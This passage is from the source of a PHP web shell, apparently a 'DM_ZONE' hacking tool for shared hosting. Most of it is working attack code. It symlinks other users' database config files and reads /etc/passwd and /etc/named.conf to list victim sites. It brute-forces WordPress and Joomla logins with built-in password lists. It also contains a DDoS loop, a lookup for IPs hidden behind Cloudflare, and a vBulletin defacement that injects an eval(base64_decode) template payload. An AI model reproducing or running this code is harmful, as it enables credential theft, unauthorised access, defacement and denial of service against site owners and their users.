- DirectoryIndex index.html index.shtml index.htm index.php \r
- RemoveHandler .php \r
- AddType text/html .shtml \r
- AddType application/octet-stream .php \r
- AddHandler server-parsed .shtml";
- $f = fopen('LITESPEED/.htaccess','w');
- fwrite($f,$r);
- $consym="<a href=LITESPEED/><b><span class='b11'>[ CONFIG KILLER ]</span></b> </a>";
- echo " [~] ";
- echo "$consym";
- echo " [~]</nobr>";
- $usr=explode("\n",$_POST['user']);
- $configuration=array(
- "aksi.php",
- "aksi.php.old",
- "aksi.php.bak",
- "conf.php",
- "conf.php.old",
- "conf.php.bak",
- "conf_global.php",
- "conf_global.php.old",
- "conf_global.php.bak",
- "config.php",
- "config.php.old",
- "config.php.bak",
- "configuration.php",
- "configuration.php.old",
- "configuration.php.bak",
- "conn.php",
- "conn.php.old",
- "conn.php.bak",
- "connect.php",
- "connect.php.old",
- "connect.php.bak",
- "connection.php",
- "connection.php.old",
- "connection.php.bak",
- "db.php",
- "db.php.old",
- "db.php.bak",
- "database.php",
- "database.php.old",
- "database.php.bak",
- "inc.php",
- "inc.php.old",
- "inc.php.bak",
- "koneksi.php",
- "koneksi.php.old",
- "koneksi.php.bak",
- "mysql.php",
- "myqsl.php.old",
- "mysql.php.bak",
- "setting.php",
- "setting.php.old",
- "setting.php.bak",
- "Settings.php",
- "Settings.php.old",
- "Settings.php.bak",
- "sql.php",
- "sql.php.old",
- "sql.php.bak");
- foreach($usr as $uss ){
- $us=trim($uss);
- foreach($configuration as $c){
- $rs="/home/".$us."/public_html/".$c;
- $r="LITESPEED/".$us."~".$c;
- symlink($rs,$r);
- }
- }
- }
- ?>
- <?php }
- // x=mysql1
- elseif(isset($_GET['x']) && ($_GET['x'] == 'mysql1')) {
- if(isset($_GET['sqlhost']) && isset($_GET['sqluser']) && isset($_GET['sqlpass']) && isset($_GET['sqlport'])) {
- $sqlhost = $_GET['sqlhost'];
- $sqluser = $_GET['sqluser'];
- $sqlpass = $_GET['sqlpass'];
- $sqlport = $_GET['sqlport'];
- if($con = @mysql_connect($sqlhost.":".$sqlport,$sqluser,$sqlpass)){
- $msg .= "<div style=\"width:99%;padding:4px 10px 0 10px;\">";
- $msg .= "<p>Connected to ".$sqluser."<span class=\"gaya\">@</span>".$sqlhost.":".$sqlport;
- $msg .= " <span class=\"gaya\">-></span> <a href=\"?dm=".$pwd."&x=mysql&
- sqlhost=".$sqlhost."&sqluser=".$sqluser."&
- sqlpass=".$sqlpass."&
- sqlport=".$sqlport."&\">[ databases ]</a>";
- if(isset($_GET['db']))
- $msg .= " <span class=\"gaya\">-></span>
- <a href=\"dm=".$pwd."&x=mysql&
- sqlhost=".$sqlhost."&sqluser=".$sqluser."&
- sqlpass=".$sqlpass."&
- sqlport=".$sqlport."&
- db=".$_GET['db']."\">".htmlspecialchars($_GET['db'])."</a>";
- if(isset($_GET['table']))
- $msg .= " <span class=\"gaya\">-></span> <a href=\"dm=".$pwd."&x=mysql&
- sqlhost=".$sqlhost."&sqluser=".$sqluser."&
- sqlpass=".$sqlpass."&sqlport=".$sqlport."&
- db=".$_GET['db']."&
- table=".$_GET['table']."\">".htmlspecialchars($_GET['table'])."</a>";
- $msg .= "</p><p>version : ".mysql_get_server_info($con)." proto ".mysql_get_proto_info($con)."</p>";
- $msg .= "</div>";
- echo $msg;
- if(isset($_GET['db']) && (!isset($_GET['table'])) && (!isset($_GET['sqlquery']))){
- $db = $_GET['db'];
- $query = "DROP TABLE IF EXISTS dm0_table; \nCREATE TABLE `dm0_table` ( `file` LONGBLOB NOT NULL ); \nLOAD DATA INFILE \"/etc/passwd\"\nINTO TABLE Z3r0Z3r0_table;SELECT * FROM dm0_table; \nDROP TABLE IF EXISTS dm_table;";
- $msg = "<div style=\"width:99%;padding:0 10px;\"><form action=\"?\" method=\"get\"><input type=\"hidden\" name=\"dm\" value=\"".$pwd."\" />
- <input type=\"hidden\" name=\"x\" value=\"mysql\" />
- <input type=\"hidden\" name=\"sqlhost\" value=\"".$sqlhost."\" />
- <input type=\"hidden\" name=\"sqluser\" value=\"".$sqluser."\" />
- <input type=\"hidden\" name=\"sqlport\" value=\"".$sqlport."\" />
- <input type=\"hidden\" name=\"sqlpass\" value=\"".$sqlpass."\" />
- <input type=\"hidden\" name=\"db\" value=\"".$db."\" />
- <p><textarea name=\"sqlquery\" class=\"output\" style=\"width:98%;height:80px;\">$query</textarea></p>
- <p><input class=\"inputzbut\" style=\"width:80px;\" name=\"submitquery\" type=\"submit\" value=\"Go\" /></p>
- </form>
- </div> ";
- $tables = array();
- $msg .= "<table class=\"explore\" style=\"width:99%;\"><tr><th>available tables on ".$db."</th></tr>";
- $hasil = @mysql_list_tables($db,$con);
- while(list($table) = @mysql_fetch_row($hasil)){
- @array_push($tables,$table);
- }
- @sort($tables);
- foreach($tables as $table){
- $msg .= "<tr><td><a href=\"?dm=".$pwd."&x=mysql&sqlhost=".$sqlhost."&sqluser=".$sqluser."&sqlpass=".$sqlpass."&sqlport=".$sqlport."&db=".$db."&table=".$table."\">$table</a></td></tr>";
- }
- $msg .= "</table>";
- }
- elseif(isset($_GET['table']) && (!isset($_GET['sqlquery'])))
- {
- $db = $_GET['db'];
- $table = $_GET['table'];
- $query = "SELECT * FROM ".$db.".".$table." LIMIT 0,100;";
- $msgq = "<div style=\"width:99%;padding:0 10px;\">
- <form action=\"?\" method=\"get\">
- <input type=\"hidden\" name=\"dm\" value=\"".$pwd."\" />
- <input type=\"hidden\" name=\"x\" value=\"mysql\" />
- <input type=\"hidden\" name=\"sqlhost\" value=\"".$sqlhost."\" />
- <input type=\"hidden\" name=\"sqluser\" value=\"".$sqluser."\" />
- <input type=\"hidden\" name=\"sqlport\" value=\"".$sqlport."\" />
- <input type=\"hidden\" name=\"sqlpass\" value=\"".$sqlpass."\" />
- <input type=\"hidden\" name=\"db\" value=\"".$db."\" />
- <input type=\"hidden\" name=\"table\" value=\"".$table."\" />
- <p><textarea name=\"sqlquery\" class=\"output\" style=\"width:98%;height:80px;\">".$query."</textarea></p>
- <p><input class=\"inputzbut\" style=\"width:80px;\" name=\"submitquery\" type=\"submit\" value=\"Go\" /></p>
- </form></div> ";
- $columns = array();
- $msg = "<table class=\"explore\" style=\"width:99%;\">";
- $hasil = @mysql_query("SHOW FIELDS FROM ".$db.".".$table);
- while(list($column) = @mysql_fetch_row($hasil)){
- $msg .= "<th>$column</th>"; $kolum = $column;
- }
- $msg .= "</tr>";
- $hasil = @mysql_query("SELECT count(*) FROM ".$db.".".$table);
- list($total) = mysql_fetch_row($hasil);
- if(isset($_GET['z'])) $page = (int) $_GET['z'];
- else $page = 1;
- $pagenum = 100;
- $totpage = ceil($total / $pagenum);
- $start = (($page - 1) * $pagenum);
- $hasil = @mysql_query("SELECT * FROM ".$db.".".$table." LIMIT ".$start.",".$pagenum);
- while($datas = @mysql_fetch_assoc($hasil)){
- $msg .= "<tr>";
- foreach($datas as $data){ if(trim($data) == "") $data = " "; $msg .= "<td>$data</td>"; }
- $msg .= "</tr>";
- }
- $msg .= "</table>";
- $head = "<div style=\"padding:10px 0 0 6px;\"><form action=\"?\" method=\"get\">
- <input type=\"hidden\" name=\"dm\" value=\"".$pwd."\" />
- <input type=\"hidden\" name=\"x\" value=\"mysql\" />
- <input type=\"hidden\" name=\"sqlhost\" value=\"".$sqlhost."\" />
- <input type=\"hidden\" name=\"sqluser\" value=\"".$sqluser."\" />
- <input type=\"hidden\" name=\"sqlport\" value=\"".$sqlport."\" />
- <input type=\"hidden\" name=\"sqlpass\" value=\"".$sqlpass."\" />
- <input type=\"hidden\" name=\"db\" value=\"".$db."\" />
- <input type=\"hidden\" name=\"table\" value=\"".$table."\" />
- Page <select class=\"inputz\" name=\"z\" onchange=\"this.form.submit();\">";
- for($i = 1;$i <= $totpage;$i++){
- $head .= "<option value=\"".$i."\">".$i."</option>";
- if($i == $_GET['z']) $head .= "<option value=\"".$i."\" selected=\"selected\">".$i."</option>";
- }
- $head .= "</select><noscript><input class=\"inputzbut\" type=\"submit\" value=\"Go !\" /></noscript></form></div>";
- $msg = $msgq.$head.$msg;
- }
- elseif(isset($_GET['submitquery']) && ($_GET['sqlquery'] != "")){
- $db = $_GET['db'];
- $query = magicboom($_GET['sqlquery']);
- $msg = "<div style=\"width:99%;padding:0 10px;\"><form action=\"?\" method=\"get\">
- <input type=\"hidden\" name=\"dm\" value=\"".$pwd."\" />
- <input type=\"hidden\" name=\"x\" value=\"mysql\" />
- <input type=\"hidden\" name=\"sqlhost\" value=\"".$sqlhost."\" />
- <input type=\"hidden\" name=\"sqluser\" value=\"".$sqluser."\" />
- <input type=\"hidden\" name=\"sqlport\" value=\"".$sqlport."\" />
- <input type=\"hidden\" name=\"sqlpass\" value=\"".$sqlpass."\" />
- <input type=\"hidden\" name=\"db\" value=\"".$db."\" />
- <p><textarea name=\"sqlquery\" class=\"output\" style=\"width:98%;height:80px;\">".$query."</textarea></p>
- <p><input class=\"inputzbut\" style=\"width:80px;\" name=\"submitquery\" type=\"submit\" value=\"Go\" /></p></form></div> ";
- @mysql_select_db($db);
- $querys = explode(";",$query); foreach($querys as $query){
- if(trim($query) != ""){
- $hasil = mysql_query($query);
- if($hasil){
- $msg .= "<p style=\"padding:0;margin:20px 6px 0 6px;\">".$query.";
- <span class=\"gaya\">[</span> ok <span class=\"gaya\">]</span></p>";
- $msg .= "<table class=\"explore\" style=\"width:99%;\"><tr>";
- for($i=0;$i<@mysql_num_fields($hasil);$i++) $msg .= "<th>".htmlspecialchars(@mysql_field_name($hasil,$i))."</th>";
- $msg .= "</tr>";
- for($i=0;$i<@mysql_num_rows($hasil);$i++) {
- $rows=@mysql_fetch_array($hasil);
- $msg .= "<tr>";
- for($j=0;$j<@mysql_num_fields($hasil);$j++) {
- if($rows[$j] == "") $dataz = " ";
- else $dataz = $rows[$j];
- $msg .= "<td>".$dataz."</td>";
- }
- $msg .= "</tr>";
- }
- $msg .= "</table>";
- }
- else
- $msg .= "<p style=\"padding:0;margin:20px 6px 0 6px;\">".$query."; <span class=\"gaya\">[</span> error <span class=\"gaya\">]</span></p>";
- }
- }
- }
- else {
- $query = "SHOW PROCESSLIST;\n SHOW VARIABLES;\n SHOW STATUS;";
- $msg = "<div style=\"width:99%;padding:0 10px;\">
- <form action=\"?\" method=\"get\">
- <input type=\"hidden\" name=\"dm\" value=\"".$pwd."\" />
- <input type=\"hidden\" name=\"x\" value=\"mysql\" />
- <input type=\"hidden\" name=\"sqlhost\" value=\"".$sqlhost."\" />
- <input type=\"hidden\" name=\"sqluser\" value=\"".$sqluser."\" />
- <input type=\"hidden\" name=\"sqlport\" value=\"".$sqlport."\" />
- <input type=\"hidden\" name=\"sqlpass\" value=\"".$sqlpass."\" />
- <input type=\"hidden\" name=\"db\" value=\"".$db."\" />
- <p><textarea name=\"sqlquery\" class=\"output\" style=\"width:98%;height:80px;\">".$query."</textarea></p>
- <p><input class=\"inputzbut\" style=\"width:80px;\" name=\"submitquery\" type=\"submit\" value=\"Go\" /></p>
- </form></div> ";
- $dbs = array();
- $msg .= "<table class=\"explore\" style=\"width:99%;\"><tr><th>available databases</th></tr>";
- $hasil = @mysql_list_dbs($con);
- while(list($db) = @mysql_fetch_row($hasil)){ @array_push($dbs,$db); }
- @sort($dbs);
- foreach($dbs as $db){
- $msg .= "<tr><td><a href=\"?dm=".$pwd."&x=mysql&sqlhost=".$sqlhost."&sqluser=".$sqluser."&sqlpass=".$sqlpass."&sqlport=".$sqlport."&db=".$db."\">$db</a></td></tr>";
- }
- $msg .= "</table>";
- }
- @mysql_close($con);
- }
- else $msg = "<p style=\"text-align:center;\">cant connect to mysql server</p>";
- echo $msg;
- }
- else{
- ?>
- <form action="?" method="get">
- <input type="hidden" name="dm" value="<?php echo $pwd; ?>" />
- <input type="hidden" name="x" value="mysql" />
- <table class="tabnet" style="width:300px;">
- <tr>
- <th colspan="2">Connect to mySQL server</th>
- </tr>
- <tr>
- <td> Host</td>
- <td><input style="width:220px;" class="inputz" type="text" name="sqlhost" value="localhost" /></td></tr>
- <tr>
- <td> Username</td>
- <td><input style="width:220px;" class="inputz" type="text" name="sqluser" value="root" /></td></tr>
- <tr>
- <td> Password</td>
- <td><input style="width:220px;" class="inputz" type="text" name="sqlpass" value="password" /></td></tr>
- <tr>
- <td> Port</td>
- <td><input style="width:80px;" class="inputz" type="text" name="sqlport" value="3306" /> <input style="width:19%;" class="inputzbut" type="submit" value="Go !" name="submitsql" /></td>
- </tr></table></form>
- <?php } }
- elseif(isset($_GET['x']) && ($_GET['x'] == 'mail')) {
- if(isset($_POST['mail_send'])) {
- $mail_to = $_POST['mail_to'];
- $mail_from = $_POST['mail_from'];
- $mail_subject = $_POST['mail_subject'];
- $mail_content = magicboom($_POST['mail_content']); if(@mail($mail_to,$mail_subject,$mail_content,"FROM:$mail_from"))
- { $msg = "email sent to $mail_to"; }
- else $msg = "send email failed";
- }
- ?>
- <form action="?y=<?php echo $pwd; ?>&x=mail" method="post">
- <table class="cmdbox"> <tr>
- <td><textarea class="output" name="mail_content" id="cmd" style="height:340px;">Hey admin, please patch your site :)</textarea></td></tr>
- <tr>
- <td> <input class="inputz" style="width:20%;" type="text" value="admin@somesome.com" name="mail_to" /> mail to</td></tr>
- <tr><td> <input class="inputz" style="width:20%;" type="text" value="gue@ganteng.com" name="mail_from" /> from</td></tr>
- <tr><td> <input class="inputz" style="width:20%;" type="text" value="patch me" name="mail_subject" /> subject</td></tr>
- <tr><td> <input style="width:19%;" class="inputzbut" type="submit" value="Go !" name="mail_send" /></td></tr>
- <tr><td> <?php echo $msg; ?>
- </td></tr>
- </table> </form>
- <?php }
- #x=jumping
- elseif(isset($_GET['x']) && ($_GET['x'] == 'jumping')) { ?>
- <form action="?dm=<?php echo $pwd; ?>&x=jumping" method="post">
- <?php
- ($sm = ini_get('safe_mode') == 0) ? $sm = 'off': die('<center><br/><br/><nobr><span class=b9>SAFE MODE ON</span></nobr><br/><br/></center> ');
- set_time_limit(0);
- @$passwd = fopen('/etc/passwd-','r');
- if (!$passwd) {
- die('<center><br/><br/><nobr><span class=b9>READ ETC/PASSWD- NOT AVAILABLE</span></nobr><br/><br/></center>');
- }
- $pub = array();
- $users = array();
- $conf = array();
- $i = 0;
- while(!feof($passwd)) {
- $str = fgets($passwd);
- if ($i > 10) {
- $pos = strpos($str,':');
- $username = substr($str,0,$pos);
- $dirz = '/home/'.$username.'/public_html/';
- if (($username != '')) {
- if (is_readable($dirz)) {
- array_push($users,$username);
- array_push($pub,$dirz);
- }
- }
- }
- $i++;
- }
- echo "<center><br/><br/><nobr><b><span class='b7'>O=:[ READABLE</span> <span class='b8'>PUBLIC_HTML ]:=O</span></b></nobr><br/><br/><table align='center' border='3' width='200' cellspacing='0' cellpadding='0'>
- <tr><th><b>TOTAL : ".sizeof($pub)." TARGET VICTIM"."</th></tr>";
- foreach ($users as $user) {
- $path = "/home/$user/public_html/";
- echo "<tr>";
- echo "<td><a href='?dm=$path' target='_blank' style='font-weight:bold; color:#FFFFFF;'>$path</td>";
- }
- echo "</tr>";
- echo "</table></center></body></html>";
- }
- # x=domain
- elseif(isset($_GET['x']) && ($_GET['x'] == 'domain')) { ?>
- <form action="?dm=<?php echo $pwd; ?>&x=domain" method="post">
- <?php
- echo '<br><br></center><br><br><div class=content>';
- $file = @implode(@file("/etc/named.conf"));
- if(!$file){ die("can't ReaD -> [ /etc/named.conf ");
- }
- preg_match_all("#named/(.*?).db#",$file ,$r);
- $domains = array_unique($r[1]);
- //check();
- //if(isset($_GET['ShowAll']))
- {
- echo "<table align=center border=1 width=59% cellpadding=5>
- <tr><td colspan=2>[+] ADA [ <b>".count($domains)."</b> ] DOMAIN</td></tr>
- <tr><td>Domain</td><td>User</td></tr>";
- foreach($domains as $domain){
- $user = posix_getpwuid(@fileowner("/etc/valiases/".$domain));
- echo "<tr><td>$domain</td><td>".$user['name']."</td></tr>";
- }
- echo "</table>";
- }
- echo '</div>';
- }
- # x=crypter
- elseif(isset($_GET['x']) && ($_GET['x'] == 'crypter')) {
- $submit= $_POST['enter'];
- $pass = $_POST['password'];
- if(isset($submit)) {
- $salt = '}#f4ga~g%7hjg4&j(7mk?/!bj30ab-wi=6^7-$^R9F|GK5J#E6WT;IO[JN';
- $hash = md5($pass);
- $hash_md5 = md5($salt.$pass);
- $hash_md5_double = md5(sha1($salt.$pass));
- $hash1 = sha1($pass);
- $hash1_sha1 = sha1($salt.$pass);
- $hash1_sha1_double = sha1(md5($salt.$pass));
- }
- echo '<form action="" method="post"><b><table class=tabnet>';
- echo '<tr><th colspan="2">Password Hash</th></center></tr>';
- echo '<tr><td><b>Masukan Kata : </b></td>';
- echo '<td><input class="inputz" type="text" name="password" size="40" />';
- echo '<input class="inputzbut" type="submit" name="enter" value="hash" />';
- echo '</td></tr><br>';
- echo '<tr><th colspan="2">Hasil Hash</th></center></tr>';
- echo '<tr><td>Original</td><td><input class=inputz type=text size=50 value='.$pass.'></td></tr><br><br>';
- echo '<tr><td>MD5</td><td><input class=inputz type=text size=50 value='.$hash.'></td></tr><br><br>';
- echo '<tr><td>MD5 with Salt</td><td><input class=inputz type=text size=50 value='.$hash_md5.'></td></tr><br><br>';
- echo '<tr><td>MD5 with Salt & Sha1</td><td><input class=inputz type=text size=50 value='.$hash_md5_double.'></td></tr><br><br>';
- echo '<tr><td>Sha1</td><td><input class=inputz type=text size=50 value='.$hash1.'></td></tr><br><br>';
- echo '<tr><td>Sha1 with Salt</td><td><input class=inputz type=text size=50 value='.$hash1_sha1.'></td></tr><br><br>';
- echo '<tr><td>Sha1 with Salt & MD5</td><td><input class=inputz type=text size=50 value='.$hash1_sha1_double.'></td></tr><br><br></table>';
- }
- # x=wp1
- elseif(isset($_GET['x']) && ($_GET['x'] == 'wp1')) { ?>
- <form action="?dm=<?php echo $pwd; ?>&x=wp1" method="post">
- <center><br/><br/>
- <form enctype="multipart/form-data" method="POST">
- <table width='624' border='0' class='tabnet' id='Box'>
- <tr><th colspan="5">Wordpress Brute Force</th></tr>
- <tr><td > </td>
- <td><p>Hosts:</p></td>
- <td><p>Users:</p></td>
- <td><p>Passwords:</p></td></tr>
- <tr><td> </td>
- <td ><textarea style="background:black;" name="hosts" cols="30" rows="10" ><?php if($_POST){echo $_POST['hosts'];} ?></textarea></td>
- <td><textarea style="background:black;" name="usernames" cols="30" rows="10" ><?php if($_POST){echo $_POST['usernames'];}else {echo "admin";} ?></textarea></td>
- <td ><textarea style="background:black;" name="passwords" cols="30" rows="10" >
- <?php if($_POST){echo$_POST['passwords'];}else {echo"admin\nadministrator\nadmin123\nqwerty\n123qwerty\nqwerty12345\n123admin\12345admin\nqwe123rty\n123123\n123321\n123456\n1234567\n12345678\n123456789\n123456123456\nadmin2010\nadmin2011\npassword\nP@ssW0rd\n!@#$%^\n!@#$%^&*(\n(*&^%$#@!\n111111\n222222\n333333\n444444\n555555\n666666\n777777\n888888\n999999";}?></textarea></td></tr>
- <tr><td colspan="4"><input class='inputzbut' type="submit" name="submit" value="Brute Now" />
- <?php
- if($_POST){
- $hosts = trim(filter($_POST['hosts']));
- $passwords = trim(filter($_POST['passwords']));
- $usernames = trim(filter($_POST['usernames']));
- if($passwords && $usernames && $hosts)
- {
- $hosts_explode = explode("\n", $hosts);
- $usernames_explode = explode("\n", $usernames);
- $passwords_explode = explode("\n", $passwords);
- foreach($hosts_explode as $host)
- {
- $host = RemoveLastSlash($host);
- $hacked = 0;
- $host = str_replace(array("http://","https://","www."),"",trim($host));
- $host = "http://".$host;
- $wpAdmin = $host.'/wp-admin/';
- if(!url_exists($host."/wp-login.php"))
- {echo "<p>".$host." => <font color='red'>Error In Login Page !</font></p>";
- ob_flush();
- flush();
- continue;
- }
- foreach($usernames_explode as $username)
- {
- foreach($passwords_explode as $password)
- {
- $ch = curl_init();
- curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
- curl_setopt($ch,CURLOPT_URL,$host.'/wp-login.php');
- curl_setopt($ch,CURLOPT_COOKIEJAR,"coki.txt");
- curl_setopt($ch,CURLOPT_COOKIEFILE,"coki.txt");
- curl_setopt($ch,CURLOPT_FOLLOWLOCATION,1);
- curl_setopt($ch,CURLOPT_POST,TRUE);
- curl_setopt($ch,CURLOPT_POSTFIELDS,"log=".$username."&pwd=".$password."&wp-submit=Giri‏"."&redirect_to=".$wpAdmin."&testcookie=1");
- $login =curl_exec($ch);
- if(eregi("profile.php",$login)) {
- $hacked = 1;
- echo "<p>".$host." => UserName : [<font color='green'>".$username."</font>] : Password : [<font color='green'>".$password."</font>]</p>";
- ob_flush();
- flush();
- break;
- }
- }
- if($hacked == 1){break;}
- }
- if($hacked == 0)
- {echo "<p>".$host." => <font color='red'>Failed !</font></p>";ob_flush();flush();}
- }
- }
- else {echo "<p><font color='red'>All fields are Required ! </font></p>";}
- }
- ?>
- </td></tr>
- </table></form></center>
- <?php
- function url_exists($strURL) {
- $resURL = curl_init();
- curl_setopt($resURL, CURLOPT_URL, $strURL);
- curl_setopt($resURL, CURLOPT_BINARYTRANSFER, 1);
- curl_setopt($resURL, CURLOPT_HEADERFUNCTION, 'curlHeaderCallback');
- curl_setopt($resURL, CURLOPT_FAILONERROR, 1);
- curl_exec ($resURL);
- $intReturnCode = curl_getinfo($resURL, CURLINFO_HTTP_CODE);
- curl_close ($resURL);
- if ($intReturnCode != 200){return false;} else {return true ;}
- }
- function filter($string)
- {
- if(get_magic_quotes_gpc() != 0){return stripslashes($string); }
- else{return $string; }
- }
- function RemoveLastSlash($host)
- {
- if(strrpos($host, '/', -1) == strlen($host)-1)
- {return substr($host,0,strrpos($host, '/', -1));}
- else{return $host;}
- }
- echo "</p>";
- }
- # x=jm1
- elseif(isset($_GET['x']) && ($_GET['x'] == 'jm1')) { ?>
- <form action="?dm=<?php echo $pwd; ?>&x=jm1" method="post">
- <center><br /><br />
- <form method="post" action="" enctype="multipart/form-data">
- <table class="tabnet" width="38%" border="0"><center>
- <th colspan="2">Joomla Brute Force</th>
- <tr>
- <td><p ><font class="d1">User :</font></th>
- <input class="inputz" type='text' name="usr" value="admin" size="15"> </font></center><br /><br /></p>
- </td></tr>
- <tr><td><font class="">Sites list :</font>
- </td><td><font class="" >Pass list :</font></td></tr>
- <tr><td>
- <textarea name="sites" style="background:black;" cols="40" rows="13" ></textarea>
- </td><td>
- <textarea name="w0rds" style="background:black;" cols="40" rows="13" >
- admin
- 123qwe456rty
- qwerty
- fuck
- administrator
- passjomla
- adminpass
- 123456
- password
- 102030
- 123123
- 12345
- 123456789
- pass
- test
- admin123
- demo
- !@#$%^</textarea>
- </td></tr><center><tr><td>
- <font >
- <input class="inputzbut" type="submit" name="x" value=" >> " id="d4">
- </font></td></tr><br><br></center></table>
- </form></center>
- <?
- @set_time_limit(0);
- if($_POST['x']){
- echo "<hr>";
- $sites = explode("\n",$_POST["sites"]);
- $w0rds = explode("\n",$_POST["w0rds"]);
- $Attack = new Joomla_brute_Force();
- foreach($w0rds as $pwd){
- foreach($sites as $site){
- $Attack->check_it(txt_cln($site),$_POST['usr'],txt_cln($pwd));
- flush();flush();
- } } }
- function txt_cln($value) {
- return str_replace(array("\n","\r"),"",$value);
- }
- class Joomla_brute_Force{
- public function check_it($site,$user,$pass){
- if(eregi('com_config',$this->post($site,$user,$pass))){
- echo "<span class=\"x2\"><b># Success : $user:$pass -> <a href='$site/administrator/index.php'>$site/administrator/index.php</a></b></span><BR>";
- $f = fopen("Result.txt","a+");
- fwrite($f , "Success ~~ $user:$pass -> $site/administrator/index.php\n");
- fclose($f);
- flush();
- } else {
- echo "# Failed : $user:$pass -> $site<BR>"; flush();
- }
- }
- public function post($site,$user,$pass){
- $token = $this->extract_token($site);
- $curl=curl_init();
- curl_setopt($curl,CURLOPT_RETURNTRANSFER,1);
- curl_setopt($curl,CURLOPT_URL,$site."/administrator/index.php");
- @curl_setopt($curl,CURLOPT_COOKIEFILE,'cookie.txt');
- @curl_setopt($curl,CURLOPT_COOKIEJAR,'cookie.txt');
- curl_setopt($curl,CURLOPT_USERAGENT,'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.15) Gecko/2008111317 Firefox/3.0.4');
- @curl_setopt($curl,CURLOPT_FOLLOWLOCATION,1);
- curl_setopt($curl,CURLOPT_POST,1);
- curl_setopt($curl,CURLOPT_POSTFIELDS,'username='.$user.'&passwd='.$pass.'&lang=en-GB&option=com_login&task=login&'.$token.'=1');
- curl_setopt($curl,CURLOPT_TIMEOUT,20);
- $exec=curl_exec($curl);
- curl_close($curl);
- return $exec;
- }
- public function extract_token($site){
- $source = $this->get_source($site);
- preg_match_all("/type=\"hidden\" name=\"([0-9a-f]{32})\" value=\"1\"/si" ,$source,$token);
- return $token[1][0];
- }
- public function get_source($site){
- $curl=curl_init();
- curl_setopt($curl,CURLOPT_RETURNTRANSFER,1);
- curl_setopt($curl,CURLOPT_URL,$site."/administrator/index.php");
- @curl_setopt($curl,CURLOPT_COOKIEFILE,'cookie.txt');
- @curl_setopt($curl,CURLOPT_COOKIEJAR,'cookie.txt');
- curl_setopt($curl,CURLOPT_USERAGENT,'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.15) Gecko/2008111317 Firefox/3.0.4');
- @curl_setopt($curl,CURLOPT_FOLLOWLOCATION,1);
- curl_setopt($curl,CURLOPT_TIMEOUT,20);
- $exec=curl_exec($curl);
- curl_close($curl);
- return $exec;
- }
- }
- }
- elseif(isset($_GET['x']) && ($_GET['x'] == 'phpddos')) {
- ?>
- <form action="?dm=<?php echo $pwd; ?>&x=phpddos" method="post">
- <?php
- echo $head.$formg.$nowaddress.'<br><br><br><title>-=[ Ddos tool ]=-</title><br><br><table class="tabnet" ><b><p align="center">Address : <input class=inputz name=urldd0 size=50> Time : <input class=inputz name=timedd0 size=6 value=40000></b><br><input class="inputzbut"type=submit value=" Get Fire!!! "></form></p></table>'.$end;exit;
- if($_GET['urldd0'] && $_GET['timedd0']){
- for ($id=0;$$id<$_GET['timedd0'];$id++){
- $fp=null;
- $contents=null;
- $fp=fopen($_GET['urldd0'],"rb");
- while (!feof($fp)) {
- $contents .= fread($fp, 8192);
- }
- fclose($fp);
- }
- }
- }
- # x=cloud
- elseif(isset($_GET['x']) && ($_GET['x'] == 'cf')){
- echo '<center><br/><br/>
- <form method="POST">
- <select class="inputz" name="krz">
- <option>FTP</option>
- <option>DIRECT</option>
- <option>WEBMAIL</option>
- <option>CPANEL</option></select>
- <input class="inputz" type="text" name="target" value="url">
- <input class="inputzbut" type="submit" value=" >> "></center>';
- $target = $_POST['target'];
- if($_POST['krz'] == "ftp") {
- $ftp = gethostbyname("ftp."."$target");echo "<br><p align='center' dir='ltr'><font face='Tahoma' size='2' color='#00ff00'>Correct
- Ip Is : </font><font face='Tahoma' size='2' color='#F68B1F'>$ftp</font></p>";
- }
- if($_POST['krz'] == "direct-connect") {
- $direct = gethostbyname("direct-connect."."$target");
- echo "<br><p align='center' dir='ltr'><font face='Tahoma' size='2' color='#00ff00'>Correct
- Ip Is : </font><font face='Tahoma' size='2' color='#F68B1F'>$direct</font></p>";
- }
- if($_POST['krz'] == "webmail") {
- $web = gethostbyname("webmail."."$target");
- echo "<br><p align='center' dir='ltr'><font face='Tahoma' size='2' color='#00ff00'>Correct
- Ip Is : </font><font face='Tahoma' size='2' color='#F68B1F'>$web</font></p>";
- }
- if($_POST['krz'] == "cpanel") {
- $cpanel = gethostbyname("cpanel."."$target");
- echo "<br><p align='center' dir='ltr'><font face='Tahoma' size='2' color='#00ff00'>Correct
- Ip Is : </font><font face='Tahoma' size='2' color='#F68B1F'>$cpanel</font></p>";
- }
- }
- # x=vb1
- elseif(isset($_GET['x']) && ($_GET['x'] == 'vb1')){
- ?>
- <form action="?dm=<?php echo $pwd; ?>&x=vb1" method="post">
- <br><br><br><div align="center">
- <?php
- if(empty($_POST['index'])){
- echo "<center><form method=\"POST\">
- DB Host : <input size=\"15\" value=\"localhost\" style='color:#FF0000;background-color:#000000' name=\"localhost\" type=\"text\"><br>
- DB Name : <input size=\"15\" style='color:#FF0000;background-color:#000000' value=\"\" name=\"database\" type=\"text\"><br>
- DB User : <input size=\"15\" style='color:#FF0000;background-color:#000000' value=\"\" name=\"username\" type=\"text\"><br>
- DB Pass : <input size=\"15\" style='color:#FF0000;background-color:#000000' value=\"\" name=\"password\" type=\"text\"><br>
- <br>
- <textarea name=\"index\" cols=\"100\" rows=\"20\">[+] HALAMAN INDEX DEFACE [+]</textarea><br>
- <input value=\" >> \" style='color:#FF0000;background-color:#000000' name=\"send\" type=\"submit\">
- </form></center>";
- }else{
- $localhost = $_POST['localhost'];
- $database = $_POST['database'];
- $username = $_POST['username'];
- $password = $_POST['password'];
- $index = $_POST['index'];
- @mysql_connect($localhost,$username,$password) or die(mysql_error());
- @mysql_select_db($database) or die(mysql_error());
- $index=str_replace("\'","'",$index);
- $set_index = "{\${eval(base64_decode(\'";
- $set_index .= base64_encode("echo \"$index\";");
- $set_index .= "\'))}}{\${exit()}}</textarea>";
- echo("UPDATE template SET template ='".$set_index."' ") ;
- $ok=@mysql_query("UPDATE template SET template ='".$set_index."'") or die(mysql_error());
- if($ok){
- echo "!! update finish !!<br><br>";
- }
- }
- }
- // x=traindt
- elseif(isset($_GET['x']) && ($_GET['x'] == 'traindt')) {
- // password changer
- ?>
- <form action="?dm=<?php echo $pwd; ?>&x=traindt" method="post">
- <?php
- echo "<html><head><title>TraindtUpLoginChanger</title></head>";
- echo "<body><center>
- <h2>^_^ DM_ZONE ^_^</h2>
- <h3>TraindtUp UsEr-PaSs FuCk3r</h3>
- <form method=POST action=''>
- DB HOST<br/>
